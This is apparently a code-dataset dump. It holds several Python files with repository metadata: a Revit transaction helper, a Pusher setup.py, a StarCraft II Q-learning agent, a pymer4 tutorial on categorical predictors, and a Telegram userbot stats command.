t.close()
"""
# from pyrevit import script
class Transaction:
"""
A transaction helper class.
"""
def __init__(self):
"""
Inits a new transaction.
"""
import revitron
bundle = script.get_bundle_name().replace('.pushbutton', '')
self.transaction = revitron.DB.Transaction(revitron.DOC, bundle)
self.transaction.Start()
def commit(self):
"""
Commits the open transaction.
"""
self.transaction.Commit()
def rollback(self):
"""
Rolls back the open transaction.
"""
self.transaction.RollBack()
| 21.325
| 95
| 0.532239
|
class Transaction:
def __init__(self):
import revitron
bundle = script.get_bundle_name().replace('.pushbutton', '')
self.transaction = revitron.DB.Transaction(revitron.DOC, bundle)
self.transaction.Start()
def commit(self):
self.transaction.Commit()
def rollback(self):
self.transaction.RollBack()
| true
| true
|
790af5c1ffd0a46710ca769801ece6193ae64d0f
| 576
|
py
|
Python
|
setup.py
|
tkhieu/pusher_client_python
|
2af2ceee06daf5b95eed2833760143ebe5b91946
|
[
"MIT"
] | null | null | null |
setup.py
|
tkhieu/pusher_client_python
|
2af2ceee06daf5b95eed2833760143ebe5b91946
|
[
"MIT"
] | null | null | null |
setup.py
|
tkhieu/pusher_client_python
|
2af2ceee06daf5b95eed2833760143ebe5b91946
|
[
"MIT"
] | null | null | null |
from setuptools import setup
setup(
name='pusher',
version='0.8',
description='A Python library for sending messages to Pusher',
author='Pusher',
author_email='support@pusher.com',
url='http://pusher.com',
packages=['pusher'],
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Internet :: WWW/HTTP",
],
keywords='pusher rest realtime websockets service',
license='MIT',
)
| 27.428571
| 66
| 0.616319
|
from setuptools import setup
setup(
name='pusher',
version='0.8',
description='A Python library for sending messages to Pusher',
author='Pusher',
author_email='support@pusher.com',
url='http://pusher.com',
packages=['pusher'],
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Internet :: WWW/HTTP",
],
keywords='pusher rest realtime websockets service',
license='MIT',
)
| true
| true
|
790af7237a25c95231de99572d94e2ea9aacf918
| 10,878
|
py
|
Python
|
7. Using Reward for Agent/reward_agent.py
|
Yudonggeun/PySC2-Tutorial
|
80449c3b5774a58e8ee6490379890e9abd60a11a
|
[
"Apache-2.0"
] | 2
|
2018-11-13T14:17:47.000Z
|
2018-11-14T12:37:20.000Z
|
7. Using Reward for Agent/reward_agent.py
|
Tao-Chengyang/PySC2-Tutorial
|
80449c3b5774a58e8ee6490379890e9abd60a11a
|
[
"Apache-2.0"
] | null | null | null |
7. Using Reward for Agent/reward_agent.py
|
Tao-Chengyang/PySC2-Tutorial
|
80449c3b5774a58e8ee6490379890e9abd60a11a
|
[
"Apache-2.0"
] | 1
|
2019-09-02T08:15:43.000Z
|
2019-09-02T08:15:43.000Z
|
import random
import math
import os.path
import numpy as np
import pandas as pd
from pysc2.agents import base_agent
from pysc2.lib import actions
from pysc2.lib import features
_NO_OP = actions.FUNCTIONS.no_op.id
_SELECT_POINT = actions.FUNCTIONS.select_point.id
_BUILD_SUPPLY_DEPOT = actions.FUNCTIONS.Build_SupplyDepot_screen.id
_BUILD_BARRACKS = actions.FUNCTIONS.Build_Barracks_screen.id
_TRAIN_MARINE = actions.FUNCTIONS.Train_Marine_quick.id
_SELECT_ARMY = actions.FUNCTIONS.select_army.id
_ATTACK_MINIMAP = actions.FUNCTIONS.Attack_minimap.id
_HARVEST_GATHER = actions.FUNCTIONS.Harvest_Gather_screen.id
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index
_PLAYER_ID = features.SCREEN_FEATURES.player_id.index
_PLAYER_SELF = 1
_PLAYER_HOSTILE = 4
_ARMY_SUPPLY = 5
_TERRAN_COMMANDCENTER = 18
_TERRAN_SCV = 45
_TERRAN_SUPPLY_DEPOT = 19
_TERRAN_BARRACKS = 21
_NEUTRAL_MINERAL_FIELD = 341
_NOT_QUEUED = [0]
_QUEUED = [1]
_SELECT_ALL = [2]
DATA_FILE = 'sparse_agent_data'
ACTION_DO_NOTHING = 'donothing'
ACTION_BUILD_SUPPLY_DEPOT = 'buildsupplydepot'
ACTION_BUILD_BARRACKS = 'buildbarracks'
ACTION_BUILD_MARINE = 'buildmarine'
ACTION_ATTACK = 'attack'
smart_actions = [
ACTION_DO_NOTHING,
ACTION_BUILD_SUPPLY_DEPOT,
ACTION_BUILD_BARRACKS,
ACTION_BUILD_MARINE,
]
for mm_x in range(0, 64):
for mm_y in range(0, 64):
if (mm_x + 1) % 32 == 0 and (mm_y + 1) % 32 == 0:
smart_actions.append(ACTION_ATTACK + '_' + str(mm_x - 16) + '_' + str(mm_y - 16))
# Stolen from https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow
class QLearningTable:
def __init__(self, actions, learning_rate=0.01, reward_decay=0.9, e_greedy=0.9):
self.actions = actions # a list
self.lr = learning_rate
self.gamma = reward_decay
self.epsilon = e_greedy
self.q_table = pd.DataFrame(columns=self.actions, dtype=np.float64)
def choose_action(self, observation):
self.check_state_exist(observation)
if np.random.uniform() < self.epsilon:
# choose best action
state_action = self.q_table.ix[observation, :]
# some actions have the same value
state_action = state_action.reindex(np.random.permutation(state_action.index))
action = state_action.idxmax()
else:
# choose random action
action = np.random.choice(self.actions)
return action
def learn(self, s, a, r, s_):
self.check_state_exist(s_)
self.check_state_exist(s)
q_predict = self.q_table.ix[s, a]
if s_ != 'terminal':
q_target = r + self.gamma * self.q_table.ix[s_, :].max()
else:
q_target = r # next state is terminal
# update
self.q_table.ix[s, a] += self.lr * (q_target - q_predict)
def check_state_exist(self, state):
if state not in self.q_table.index:
# append new state to q table
self.q_table = self.q_table.append(
pd.Series([0] * len(self.actions), index=self.q_table.columns, name=state))
class SparseAgent(base_agent.BaseAgent):
def __init__(self):
super(SparseAgent, self).__init__()
self.qlearn = QLearningTable(actions=list(range(len(smart_actions))))
self.previous_action = None
self.previous_state = None
self.cc_y = None
self.cc_x = None
self.move_number = 0
if os.path.isfile(DATA_FILE + '.gz'):
self.qlearn.q_table = pd.read_pickle(DATA_FILE + '.gz', compression='gzip')
def transformDistance(self, x, x_distance, y, y_distance):
if not self.base_top_left:
return [x - x_distance, y - y_distance]
return [x + x_distance, y + y_distance]
def transformLocation(self, x, y):
if not self.base_top_left:
return [64 - x, 64 - y]
return [x, y]
def splitAction(self, action_id):
smart_action = smart_actions[action_id]
x = 0
y = 0
if '_' in smart_action:
smart_action, x, y = smart_action.split('_')
return (smart_action, x, y)
def step(self, obs):
super(SparseAgent, self).step(obs)
if obs.last():
reward = obs.reward
self.qlearn.learn(str(self.previous_state), self.previous_action, reward, 'terminal')
self.qlearn.q_table.to_pickle(DATA_FILE + '.gz', 'gzip')
self.previous_action = None
self.previous_state = None
self.move_number = 0
return actions.FunctionCall(_NO_OP, [])
unit_type = obs.observation['screen'][_UNIT_TYPE]
if obs.first():
player_y, player_x = (obs.observation['feature_minimap'][_PLAYER_RELATIVE] == _PLAYER_SELF).nonzero()
self.base_top_left = 1 if player_y.any() and player_y.mean() <= 31 else 0
self.cc_y, self.cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
cc_y, cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
cc_count = 1 if cc_y.any() else 0
depot_y, depot_x = (unit_type == _TERRAN_SUPPLY_DEPOT).nonzero()
supply_depot_count = int(round(len(depot_y) / 69))
barracks_y, barracks_x = (unit_type == _TERRAN_BARRACKS).nonzero()
barracks_count = int(round(len(barracks_y) / 137))
if self.move_number == 0:
self.move_number += 1
current_state = np.zeros(8)
current_state[0] = cc_count
current_state[1] = supply_depot_count
current_state[2] = barracks_count
current_state[3] = obs.observation['player'][_ARMY_SUPPLY]
hot_squares = np.zeros(4)
enemy_y, enemy_x = (obs.observation['feature_minimap'][_PLAYER_RELATIVE] == _PLAYER_HOSTILE).nonzero()
for i in range(0, len(enemy_y)):
y = int(math.ceil((enemy_y[i] + 1) / 32))
x = int(math.ceil((enemy_x[i] + 1) / 32))
hot_squares[((y - 1) * 2) + (x - 1)] = 1
if not self.base_top_left:
hot_squares = hot_squares[::-1]
for i in range(0, 4):
current_state[i + 4] = hot_squares[i]
if self.previous_action is not None:
self.qlearn.learn(str(self.previous_state), self.previous_action, 0, str(current_state))
rl_action = self.qlearn.choose_action(str(current_state))
self.previous_state = current_state
self.previous_action = rl_action
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:
unit_y, unit_x = (unit_type == _TERRAN_SCV).nonzero()
if unit_y.any():
i = random.randint(0, len(unit_y) - 1)
target = [unit_x[i], unit_y[i]]
return actions.FunctionCall(_SELECT_POINT, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_MARINE:
if barracks_y.any():
i = random.randint(0, len(barracks_y) - 1)
target = [barracks_x[i], barracks_y[i]]
return actions.FunctionCall(_SELECT_POINT, [_SELECT_ALL, target])
elif smart_action == ACTION_ATTACK:
if _SELECT_ARMY in obs.observation['available_actions']:
return actions.FunctionCall(_SELECT_ARMY, [_NOT_QUEUED])
elif self.move_number == 1:
self.move_number += 1
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_SUPPLY_DEPOT:
if supply_depot_count < 2 and _BUILD_SUPPLY_DEPOT in obs.observation['available_actions']:
if self.cc_y.any():
if supply_depot_count == 0:
target = self.transformDistance(round(self.cc_x.mean()), -35, round(self.cc_y.mean()), 0)
elif supply_depot_count == 1:
target = self.transformDistance(round(self.cc_x.mean()), -25, round(self.cc_y.mean()), -25)
return actions.FunctionCall(_BUILD_SUPPLY_DEPOT, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_BARRACKS:
if barracks_count < 2 and _BUILD_BARRACKS in obs.observation['available_actions']:
if self.cc_y.any():
if barracks_count == 0:
target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), -9)
elif barracks_count == 1:
target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), 12)
return actions.FunctionCall(_BUILD_BARRACKS, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_MARINE:
if _TRAIN_MARINE in obs.observation['available_actions']:
return actions.FunctionCall(_TRAIN_MARINE, [_QUEUED])
elif smart_action == ACTION_ATTACK:
do_it = True
if len(obs.observation['single_select']) > 0 and obs.observation['single_select'][0][0] == _TERRAN_SCV:
do_it = False
if len(obs.observation['multi_select']) > 0 and obs.observation['multi_select'][0][0] == _TERRAN_SCV:
do_it = False
if do_it and _ATTACK_MINIMAP in obs.observation["available_actions"]:
x_offset = random.randint(-1, 1)
y_offset = random.randint(-1, 1)
return actions.FunctionCall(_ATTACK_MINIMAP, [_NOT_QUEUED,
self.transformLocation(int(x) + (x_offset * 8),
int(y) + (y_offset * 8))])
elif self.move_number == 2:
self.move_number = 0
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:
if _HARVEST_GATHER in obs.observation['available_actions']:
unit_y, unit_x = (unit_type == _NEUTRAL_MINERAL_FIELD).nonzero()
if unit_y.any():
i = random.randint(0, len(unit_y) - 1)
m_x = unit_x[i]
m_y = unit_y[i]
target = [int(m_x), int(m_y)]
return actions.FunctionCall(_HARVEST_GATHER, [_QUEUED, target])
return actions.FunctionCall(_NO_OP, [])
| 36.503356
| 119
| 0.602041
|
import random
import math
import os.path
import numpy as np
import pandas as pd
from pysc2.agents import base_agent
from pysc2.lib import actions
from pysc2.lib import features
_NO_OP = actions.FUNCTIONS.no_op.id
_SELECT_POINT = actions.FUNCTIONS.select_point.id
_BUILD_SUPPLY_DEPOT = actions.FUNCTIONS.Build_SupplyDepot_screen.id
_BUILD_BARRACKS = actions.FUNCTIONS.Build_Barracks_screen.id
_TRAIN_MARINE = actions.FUNCTIONS.Train_Marine_quick.id
_SELECT_ARMY = actions.FUNCTIONS.select_army.id
_ATTACK_MINIMAP = actions.FUNCTIONS.Attack_minimap.id
_HARVEST_GATHER = actions.FUNCTIONS.Harvest_Gather_screen.id
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index
_PLAYER_ID = features.SCREEN_FEATURES.player_id.index
_PLAYER_SELF = 1
_PLAYER_HOSTILE = 4
_ARMY_SUPPLY = 5
_TERRAN_COMMANDCENTER = 18
_TERRAN_SCV = 45
_TERRAN_SUPPLY_DEPOT = 19
_TERRAN_BARRACKS = 21
_NEUTRAL_MINERAL_FIELD = 341
_NOT_QUEUED = [0]
_QUEUED = [1]
_SELECT_ALL = [2]
DATA_FILE = 'sparse_agent_data'
ACTION_DO_NOTHING = 'donothing'
ACTION_BUILD_SUPPLY_DEPOT = 'buildsupplydepot'
ACTION_BUILD_BARRACKS = 'buildbarracks'
ACTION_BUILD_MARINE = 'buildmarine'
ACTION_ATTACK = 'attack'
smart_actions = [
ACTION_DO_NOTHING,
ACTION_BUILD_SUPPLY_DEPOT,
ACTION_BUILD_BARRACKS,
ACTION_BUILD_MARINE,
]
for mm_x in range(0, 64):
for mm_y in range(0, 64):
if (mm_x + 1) % 32 == 0 and (mm_y + 1) % 32 == 0:
smart_actions.append(ACTION_ATTACK + '_' + str(mm_x - 16) + '_' + str(mm_y - 16))
class QLearningTable:
def __init__(self, actions, learning_rate=0.01, reward_decay=0.9, e_greedy=0.9):
self.actions = actions
self.lr = learning_rate
self.gamma = reward_decay
self.epsilon = e_greedy
self.q_table = pd.DataFrame(columns=self.actions, dtype=np.float64)
def choose_action(self, observation):
self.check_state_exist(observation)
if np.random.uniform() < self.epsilon:
state_action = self.q_table.ix[observation, :]
state_action = state_action.reindex(np.random.permutation(state_action.index))
action = state_action.idxmax()
else:
action = np.random.choice(self.actions)
return action
def learn(self, s, a, r, s_):
self.check_state_exist(s_)
self.check_state_exist(s)
q_predict = self.q_table.ix[s, a]
if s_ != 'terminal':
q_target = r + self.gamma * self.q_table.ix[s_, :].max()
else:
q_target = r
self.q_table.ix[s, a] += self.lr * (q_target - q_predict)
def check_state_exist(self, state):
if state not in self.q_table.index:
self.q_table = self.q_table.append(
pd.Series([0] * len(self.actions), index=self.q_table.columns, name=state))
class SparseAgent(base_agent.BaseAgent):
def __init__(self):
super(SparseAgent, self).__init__()
self.qlearn = QLearningTable(actions=list(range(len(smart_actions))))
self.previous_action = None
self.previous_state = None
self.cc_y = None
self.cc_x = None
self.move_number = 0
if os.path.isfile(DATA_FILE + '.gz'):
self.qlearn.q_table = pd.read_pickle(DATA_FILE + '.gz', compression='gzip')
def transformDistance(self, x, x_distance, y, y_distance):
if not self.base_top_left:
return [x - x_distance, y - y_distance]
return [x + x_distance, y + y_distance]
def transformLocation(self, x, y):
if not self.base_top_left:
return [64 - x, 64 - y]
return [x, y]
def splitAction(self, action_id):
smart_action = smart_actions[action_id]
x = 0
y = 0
if '_' in smart_action:
smart_action, x, y = smart_action.split('_')
return (smart_action, x, y)
def step(self, obs):
super(SparseAgent, self).step(obs)
if obs.last():
reward = obs.reward
self.qlearn.learn(str(self.previous_state), self.previous_action, reward, 'terminal')
self.qlearn.q_table.to_pickle(DATA_FILE + '.gz', 'gzip')
self.previous_action = None
self.previous_state = None
self.move_number = 0
return actions.FunctionCall(_NO_OP, [])
unit_type = obs.observation['screen'][_UNIT_TYPE]
if obs.first():
player_y, player_x = (obs.observation['feature_minimap'][_PLAYER_RELATIVE] == _PLAYER_SELF).nonzero()
self.base_top_left = 1 if player_y.any() and player_y.mean() <= 31 else 0
self.cc_y, self.cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
cc_y, cc_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
cc_count = 1 if cc_y.any() else 0
depot_y, depot_x = (unit_type == _TERRAN_SUPPLY_DEPOT).nonzero()
supply_depot_count = int(round(len(depot_y) / 69))
barracks_y, barracks_x = (unit_type == _TERRAN_BARRACKS).nonzero()
barracks_count = int(round(len(barracks_y) / 137))
if self.move_number == 0:
self.move_number += 1
current_state = np.zeros(8)
current_state[0] = cc_count
current_state[1] = supply_depot_count
current_state[2] = barracks_count
current_state[3] = obs.observation['player'][_ARMY_SUPPLY]
hot_squares = np.zeros(4)
enemy_y, enemy_x = (obs.observation['feature_minimap'][_PLAYER_RELATIVE] == _PLAYER_HOSTILE).nonzero()
for i in range(0, len(enemy_y)):
y = int(math.ceil((enemy_y[i] + 1) / 32))
x = int(math.ceil((enemy_x[i] + 1) / 32))
hot_squares[((y - 1) * 2) + (x - 1)] = 1
if not self.base_top_left:
hot_squares = hot_squares[::-1]
for i in range(0, 4):
current_state[i + 4] = hot_squares[i]
if self.previous_action is not None:
self.qlearn.learn(str(self.previous_state), self.previous_action, 0, str(current_state))
rl_action = self.qlearn.choose_action(str(current_state))
self.previous_state = current_state
self.previous_action = rl_action
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:
unit_y, unit_x = (unit_type == _TERRAN_SCV).nonzero()
if unit_y.any():
i = random.randint(0, len(unit_y) - 1)
target = [unit_x[i], unit_y[i]]
return actions.FunctionCall(_SELECT_POINT, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_MARINE:
if barracks_y.any():
i = random.randint(0, len(barracks_y) - 1)
target = [barracks_x[i], barracks_y[i]]
return actions.FunctionCall(_SELECT_POINT, [_SELECT_ALL, target])
elif smart_action == ACTION_ATTACK:
if _SELECT_ARMY in obs.observation['available_actions']:
return actions.FunctionCall(_SELECT_ARMY, [_NOT_QUEUED])
elif self.move_number == 1:
self.move_number += 1
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_SUPPLY_DEPOT:
if supply_depot_count < 2 and _BUILD_SUPPLY_DEPOT in obs.observation['available_actions']:
if self.cc_y.any():
if supply_depot_count == 0:
target = self.transformDistance(round(self.cc_x.mean()), -35, round(self.cc_y.mean()), 0)
elif supply_depot_count == 1:
target = self.transformDistance(round(self.cc_x.mean()), -25, round(self.cc_y.mean()), -25)
return actions.FunctionCall(_BUILD_SUPPLY_DEPOT, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_BARRACKS:
if barracks_count < 2 and _BUILD_BARRACKS in obs.observation['available_actions']:
if self.cc_y.any():
if barracks_count == 0:
target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), -9)
elif barracks_count == 1:
target = self.transformDistance(round(self.cc_x.mean()), 15, round(self.cc_y.mean()), 12)
return actions.FunctionCall(_BUILD_BARRACKS, [_NOT_QUEUED, target])
elif smart_action == ACTION_BUILD_MARINE:
if _TRAIN_MARINE in obs.observation['available_actions']:
return actions.FunctionCall(_TRAIN_MARINE, [_QUEUED])
elif smart_action == ACTION_ATTACK:
do_it = True
if len(obs.observation['single_select']) > 0 and obs.observation['single_select'][0][0] == _TERRAN_SCV:
do_it = False
if len(obs.observation['multi_select']) > 0 and obs.observation['multi_select'][0][0] == _TERRAN_SCV:
do_it = False
if do_it and _ATTACK_MINIMAP in obs.observation["available_actions"]:
x_offset = random.randint(-1, 1)
y_offset = random.randint(-1, 1)
return actions.FunctionCall(_ATTACK_MINIMAP, [_NOT_QUEUED,
self.transformLocation(int(x) + (x_offset * 8),
int(y) + (y_offset * 8))])
elif self.move_number == 2:
self.move_number = 0
smart_action, x, y = self.splitAction(self.previous_action)
if smart_action == ACTION_BUILD_BARRACKS or smart_action == ACTION_BUILD_SUPPLY_DEPOT:
if _HARVEST_GATHER in obs.observation['available_actions']:
unit_y, unit_x = (unit_type == _NEUTRAL_MINERAL_FIELD).nonzero()
if unit_y.any():
i = random.randint(0, len(unit_y) - 1)
m_x = unit_x[i]
m_y = unit_y[i]
target = [int(m_x), int(m_y)]
return actions.FunctionCall(_HARVEST_GATHER, [_QUEUED, target])
return actions.FunctionCall(_NO_OP, [])
| true
| true
|
790af7bd2d5fe80e00cfb7791746b8974f1179bf
| 9,230
|
py
|
Python
|
examples/example_02_categorical.py
|
jcheong0428/pymer4
|
7e98fa28f5fdc01e8f786e381179c6b36067ef90
|
[
"MIT"
] | 127
|
2017-06-02T16:49:38.000Z
|
2022-03-18T03:45:55.000Z
|
examples/example_02_categorical.py
|
jarrelscy/pymer4
|
248c25c0c17918c7a2ed61d86f42f7188e9aad94
|
[
"MIT"
] | 90
|
2017-05-08T07:30:24.000Z
|
2022-03-29T18:26:18.000Z
|
examples/example_02_categorical.py
|
jarrelscy/pymer4
|
248c25c0c17918c7a2ed61d86f42f7188e9aad94
|
[
"MIT"
] | 26
|
2017-11-23T17:41:49.000Z
|
2022-03-04T16:10:55.000Z
|
"""
2. Categorical Predictors
=========================
"""
###############################################################################
# The syntax for handling categorical predictors is **different** between standard regression models/two-stage-models (i.e. :code:`Lm` and :code:`Lm2`) and multi-level models (:code:`Lmer`) in :code:`pymer4`. This is because formula parsing is passed to R for :code:`Lmer` models, but handled by Python for other models.
###############################################################################
# Lm and Lm2 Models
# -----------------
# :code:`Lm` and :code:`Lm2` models use `patsy <https://patsy.readthedocs.io/en/latest/>`_ to parse model formulae. Patsy is very powerful and has built-in support for handling categorical coding schemes by wrapping a predictor in then :code:`C()` *within* the module formula. Patsy can also perform some pre-processing such as scaling and standardization using special functions like :code:`center()`. Here are some examples.
# import basic libraries and sample data
import os
import pandas as pd
from pymer4.utils import get_resource_path
from pymer4.models import Lm
# IV3 is a categorical predictors with 3 levels in the sample data
df = pd.read_csv(os.path.join(get_resource_path(), "sample_data.csv"))
###############################################################################
# Dummy-coded/Treatment contrasts
# +++++++++++++++++++++++++++++++
# Estimate a model using Treatment contrasts (dummy-coding)
# with '1.0' as the reference level
# This is the default of the C() function
model = Lm("DV ~ C(IV3, levels=[1.0, 0.5, 1.5])", data=df)
print(model.fit())
###############################################################################
# Orthogonal Polynomial Contrasts
# +++++++++++++++++++++++++++++++
# Patsy can do this using the Poly argument to the
# C() function
model = Lm("DV ~ C(IV3, Poly)", data=df)
print(model.fit())
###############################################################################
# Sum-to-zero contrasts
# +++++++++++++++++++++
# Similar to before but with the Sum argument
model = Lm("DV ~ C(IV3, Sum)", data=df)
print(model.fit())
###############################################################################
# Scaling/Centering
# +++++++++++++++++
# Moderation with IV2, but centering IV2 first
model = Lm("DV ~ center(IV2) * C(IV3, Sum)", data=df)
print(model.fit())
###############################################################################
# Please refer to the `patsy documentation <https://patsy.readthedocs.io/en/latest/categorical-coding.html>`_ for more details when working categorical predictors in :code:`Lm` or :code:`Lm2` models.
###############################################################################
# Lmer Models
# -----------
# :code:`Lmer()` models currently have support for handling categorical predictors in one of three ways based on how R's :code:`factor()` works (see the note at the end of this tutorial):
#
# - Dummy-coded factor levels (treatment contrasts) in which each model term is the difference between a factor level and a selected reference level
# - Orthogonal polynomial contrasts in which each model term is a polynomial contrast across factor levels (e.g. linear, quadratic, cubic, etc)
# - Custom contrasts for each level of a factor, which should be provided in the manner expected by R.
#
# To make re-parameterizing models easier, factor codings are passed as a dictionary to the :code:`factors` argument of a model's :code:`.fit()`. This obviates the need for adjusting data-frame properties as in R. Note that this is **different** from :code:`Lm` and :code:`Lm2` models above which expect factor codings in their formulae (because patsy does).
#
# Each of these ways also enables you to easily compute post-hoc comparisons between factor levels, as well as interactions between continuous predictors and each factor level. See tutorial 3 for more on post-hoc tests.
from pymer4.models import Lmer
# We're going to fit a multi-level logistic regression using the
# dichotomous DV_l variable and the same categorical predictor (IV3)
# as before
model = Lmer("DV_l ~ IV3 + (IV3|Group)", data=df, family="binomial")
###############################################################################
# Dummy-coding factors
# ++++++++++++++++++++
# First we'll use dummy-coding/treatment contrasts with 1.0 as the reference level. This will compute two coefficients: 0.5 > 1.0 and 1.5 > 1.0.
print(model.fit(factors={"IV3": ["1.0", "0.5", "1.5"]}))
###############################################################################
# Polynomial contrast coding
# ++++++++++++++++++++++++++
# Second we'll use orthogonal polynomial contrasts. This is accomplished using the :code:`ordered=True` argument and specifying the order of the *linear* contrast in increasing order. R will automatically compute higher order polynomial contrats that are orthogonal to this linear contrast. In this example, since there are 3 factor levels this will result in two polynomial terms: a linear contrast we specify below corresponding to 0.5 < 1.0 < 1.5 and an orthogonal quadratic contrast automatically determined by R, corresponding to 0.5 > 1 < 1.5
print(model.fit(factors={"IV3": ["0.5", "1.0", "1.5"]}, ordered=True))
###############################################################################
# Custom contrasts
# ++++++++++++++++
# :code:`Lmer` models can also take custom factor contrasts based on how they are expected by R (see the note at the end of this tutorial for how contrasts work in R). Remember that there can be at most k-1 model terms representing any k level factor without over-parameterizing a model. If you specify a custom contrast, R will generate set of orthogonal contrasts for the rest of your model terms.
# Compare level '1.0' to the mean of levels '0.5' and '1.5'
# and let R determine the second contrast orthogonal to it
print(model.fit(factors={"IV3": {"1.0": 1, "0.5": -0.5, "1.5": -0.5}}))
###############################################################################
# User-created contrasts (without R)
# ++++++++++++++++++++++++++++++++++
# Another option available to you is fitting a model with *only* your desired contrast(s) rather than a full set of k-1 contrasts. Contrary to how statistics is usually taught, you don't ever *have to* include a full set of k-1 contrasts for a k level factor! The upside to doing this is that you won't need to rely on R to compute anything for you (aside from the model fit), and you will have a model with exactly the number of terms as contrasts you desire, giving you complete control. The downside is that post-hoc tests will no longer be available (see tutorial 3 for more information on post-hoc tests), but it's unlikely you're doing post-hoc tests if you are computing a subset of specific contrasts anyway. This is also a useful approach if you don't want to use patsy's formula syntax with :code:`Lm` and :code:`Lm2` as noted above.
#
# This can be accomplished by creating new columns in your dataframe to test specific hypotheses and is trivial to do with pandas `map <https://pandas.pydata.org/pandas-docs/version/0.25/reference/api/pandas.Series.map.html/>`_ and `assign <https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.assign.html/>`_ methods. For example, here we manually compute a linear contrast by creating a new column in our dataframe and treating it as a continuous variable.
# Create a new column in the dataframe with a custom (linear) contrast
df = df.assign(IV3_custom_lin=df["IV3"].map({0.5: -1, 1.0: 0, 1.5: 1}))
print(df.head())
###############################################################################
# Now we can use this variable as a continuous predictor without the need for the :code:`factors` argument. Notice how the z-stat and p-value of the estimate are the same as the linear polynomial contrast estimated above. The coefficients differ in scale only because R uses [~-0.707, ~0, ~0.707] for its polynomial contrasts rather than [-1, 0, 1] like we did.
# Estimate model
model = Lmer(
"DV_l ~ IV3_custom_lin + (IV3_custom_lin|Group)", data=df, family="binomial"
)
print(model.fit())
###############################################################################
# A note on how contrasts in R work
# ---------------------------------
# .. note::
# This is just for folks curious about how contrasts in R work
#
# Specifying multiple custom contrasts in R has always been a point of confusion amongst users. This because the :code:`contrasts()` command in R doesn't actually expect contrast weights (i.e. a design matrix) as one would intuit. Rather, it is made for generating contrast coding schemes which are the inverse of the contrast weight matrix. For a longer explanation with examples see `this reference <https://rstudio-pubs-static.s3.amazonaws.com/65059_586f394d8eb84f84b1baaf56ffb6b47f.html>`_ and `this reference <https://github.com/ejolly/R/blob/master/Guides/Contrasts_in_R.md>`_. For these situations pymer4 offers a few utility functions to convert between these matrix types if desired in :code:`pymer4.utils`: :code:`R2con()` and :code:`con2R()`.
| 69.398496
| 843
| 0.638245
| true
| true
|
|
790af93b3af2ccf93c2c689dc115ea0a93b74347
| 777
|
py
|
Python
|
userbot/plugins/bot_stats.py
|
felapr1804/TechnoAyanBOT
|
74faac1aae1c350b0583a5e6405b414d6947162c
|
[
"MIT"
] | null | null | null |
userbot/plugins/bot_stats.py
|
felapr1804/TechnoAyanBOT
|
74faac1aae1c350b0583a5e6405b414d6947162c
|
[
"MIT"
] | null | null | null |
userbot/plugins/bot_stats.py
|
felapr1804/TechnoAyanBOT
|
74faac1aae1c350b0583a5e6405b414d6947162c
|
[
"MIT"
] | null | null | null |
# @ayushk780
# Big Thanks To Spechide and @TechnoAyanBoT
"""Counth: Avaible commands: .bstats
"""
import asyncio
from telethon import events
from uniborg.util import admin_cmd, humanbytes,get_readable_time
import shutil
import time
from userbot import botStartTime
@borg.on(admin_cmd(pattern=r"bstats"))
async def _(event):
if event.fwd_from:
return
currentTime = get_readable_time((time.time() - botStartTime))
total, used, free = shutil.disk_usage('.')
total = humanbytes(total)
used = humanbytes(used)
free = humanbytes(free)
stats = f'Bot Uptime: {currentTime}\n' \
f'Total disk space: {total}\n' \
f'Used: {used}\n' \
f'Free: {free}'
await event.edit(str(stats))
| 25.9
| 65
| 0.646075
|
import asyncio
from telethon import events
from uniborg.util import admin_cmd, humanbytes,get_readable_time
import shutil
import time
from userbot import botStartTime
@borg.on(admin_cmd(pattern=r"bstats"))
async def _(event):
if event.fwd_from:
return
currentTime = get_readable_time((time.time() - botStartTime))
total, used, free = shutil.disk_usage('.')
total = humanbytes(total)
used = humanbytes(used)
free = humanbytes(free)
stats = f'Bot Uptime: {currentTime}\n' \
f'Total disk space: {total}\n' \
f'Used: {used}\n' \
f'Free: {free}'
await event.edit(str(stats))
| true
| true
|
790afb6e4dca3da075a86e2048b42967f34a0fb7
| 1,427
|
py
|
Python
|
Lights/adafruit-circuitpython-bundle-6.x-mpy-20210310/examples/lis3dh_adc.py
|
IanSMoyes/SpiderPi
|
cc3469980ae87b92d0dc43c05dbd579f0fa8c4b1
|
[
"Apache-2.0"
] | 7
|
2021-03-15T10:06:20.000Z
|
2022-03-23T02:53:15.000Z
|
Lights/adafruit-circuitpython-bundle-6.x-mpy-20210310/examples/lis3dh_adc.py
|
IanSMoyes/SpiderPi
|
cc3469980ae87b92d0dc43c05dbd579f0fa8c4b1
|
[
"Apache-2.0"
] | 5
|
2021-04-27T18:21:11.000Z
|
